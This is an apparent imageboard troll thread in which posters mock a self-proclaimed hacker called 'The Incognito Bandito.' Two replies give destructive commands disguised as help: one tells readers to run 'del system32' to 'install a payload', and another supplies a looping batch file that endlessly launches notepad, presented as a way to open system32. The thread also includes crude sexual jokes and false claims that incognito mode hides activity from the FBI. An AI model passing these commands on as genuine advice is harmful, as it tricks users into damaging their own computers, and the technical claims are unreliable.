Ask professional hacker ~The Incognito Bandito~ anything!

Ask professional hacker ~The Incognito Bandito~ anything!

Do you browse the deep web?

You can't hack my dubs white boi

yeah! i use Sup Forums like every day.
theres nothing i cant hack!

How do u remotely install a payload into an Android device?

Hak my computah, hackermann, I need alibi to browse pics of nude women or my dad might slap my buttcheeks again.

show proofs of some sweet hackering
screenshot or your not the real deal

open command prompt then type
C:
hit enter
cd windows
hit enter
del system 32/*.*
hit enter
del system32
hit enter
and then it will open a menu to install that payload, hope this helps!

All you have to do is Open your incognito mode on Internet explorer! then one day you might be as good as the incognito bandito!

this is my sick hack i did a few days ago.

U dont even know how to use the prompt

try my dope payload hack and you will see my command prompt skills! make sure to open incognito mode in internet explorer first so the Fbi wont find you for the wicked hacks man.

holy shit thats crazy.
I bet you can even block ads like theyre nothing

Im not that skilled yet unfortunately. one day i will home my hacker skills to get rid of those pesky ads on facebook.

But, seƱor incognito, will this cover up my cum stains?
And what about 17 GB of pics that I saved on his desk?

i like to take a rag and lay it on top of the cum stains almost like my cum stains have their own incognito mode.

try my sick payload hack and your dad will never ever find that folder! itll be so hidden, its almost like the entire computer wont even turn on!

You truly live up to your name, incognito bandito!

OK, brb, have some payload to install.
Thx, maynaise, u da best bandito.

Can you hack cellphones?

Of course! theres nothing the incognito bandito cant hack! except those pesky ads on facebook.

no problem! if you need any more help just ask!

How did you ever come up with such a majestic ass nickname?

And If I get trips you have to admit if you've hacked into any government sites/programs, and why you did it?

Include me in screepcap

Well, i thought about the hacking software i use and something really cool that rhymes with it and then i made it the incognito burrito but my mom told me that was super gay, and mad eme change it to the incognito bandito.

idjdbwo fjsbegdi dkdbshsbsjdvd dj n jdbdmd???

How do you open system 32?

I don't even think this can be considered bait, he's obviously just having a laugh.

It's newfag b8.

open notepad and type:
@ECHO off

:top

START %systemroot%system32notepad.exe

GOTO top

then save the file with a .bat extension and open it, it will automatically open system 32 for you!

I'll hack you if you mess with me. The incognito Bandito never leaves incognito mode, you'll never find me.

You can't out hack my prohacks.

Come at me

not even with my superprohaxx?
i doubt that kid. my fingerless gloves have been begging to be put on.